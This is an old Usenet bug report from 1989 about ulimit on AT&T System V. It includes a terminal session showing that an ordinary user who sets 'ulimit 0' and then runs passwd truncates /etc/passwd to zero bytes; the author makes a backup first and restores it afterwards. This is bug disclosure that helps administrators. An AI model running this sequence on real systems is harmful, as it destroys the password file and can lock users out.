Path: utzoo!utgpu!jarvis.csri.toronto.edu!mailrus!ames!amdahl!oliveb!sun!sally!plocher
From: plocher%sally@Sun.COM (John Plocher)
Newsgroups: comp.bugs.sys5
Subject: Re: ulimit
Message-ID: <100455@sun.Eng.Sun.COM>
Date: 21 Apr 89 20:44:34 GMT
References: <19516@genrad.UUCP> <1319@nusdhub.UUCP> <10075@smoke.BRL.MIL> <881@cetia4.UUCP>
Sender: news@sun.Eng.Sun.COM
Reply-To: plocher@sun.COM (John Plocher)
Organization: Sun Microsystems, Mountain View
Lines: 29

In all this talk about ULIMIT don't forget that there is at least one known
bug in the AT&T SVr[23] implementation:

Kids, don't do this at home.

	login: guest
	password: xxxxx

	% su
	password: xxxxxxx
	# cp /etc/passwd /etc/passwd.old
	# exit
	% ulimit 0
	% passwd
	old password: xxxxx
	new password: yyyyy
	Please retype new password: yyyyy
	% ls -l /etc/passwd*
	-rw-r--r--  1 root            0 Apr  3 10:44 /etc/passwd
	-rw-r--r--  1 root          439 Apr  3 10:40 /etc/passwd.old
	% su
	password: xxxxxxx
	# cp /etc/passwd.old /etc/passwd

Note that the password file is now gone - aren't we glad we saved a copy? :-)

The vendors out there may have this fixed in their versions by now...

	-John Plocher